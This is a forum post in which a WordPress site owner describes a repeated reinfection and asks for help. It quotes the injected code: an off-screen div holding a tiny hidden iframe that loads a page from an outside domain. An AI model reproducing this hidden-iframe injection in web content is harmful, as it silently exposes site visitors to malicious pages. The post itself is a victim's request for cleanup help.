My WordPress site got hacked.

My WordPress site got hacked about 2 weeks ago. I was running an earlier version of WordPress 3.x. I’ve since upgraded to WordPress 3.2.1, but I’m still having trouble.

Here’s the code that keeps showing up. I’m not sure how often, but twice today so far. Maybe every hour or two.

<div style="position: absolute; left: -1999px; top: -2999px;"><iframe
src="http://qjijcmenx.co.tv/forum.php" width="3"
height="3"></iframe></div>

I’ve installed the Antivirus plugin but I really don’t understand what I’m looking at. This is the first time I’ve had a site get hacked and I’m glad it’s mine, but I’m running a ton of advertising and marketing campaigns and depending on the day / time somebody clicks on my site Google pops up saying “hey we don’t think this site is safe…blah blah blah”. It’s definitely nerve-wracking, borderline depressing.

If I reinstall WordPress by clicking the REINSTALL button under Dashboard the problem is fixed, but then it gets hacked again. I’ve changed my Admin password, removed access to all other users, changed CPanel password, FTP was never setup, and I last installed Antivirus.

Most recently, I’ve switched back to an older template/theme. I’m now trying to figure out if the new theme I installed a month or so ago is my problem.

I hope I didn’t overwhelm you guys with information, but I’m trying to tell you everything I know. Any suggestions / assistance you guys can provide would be stellar.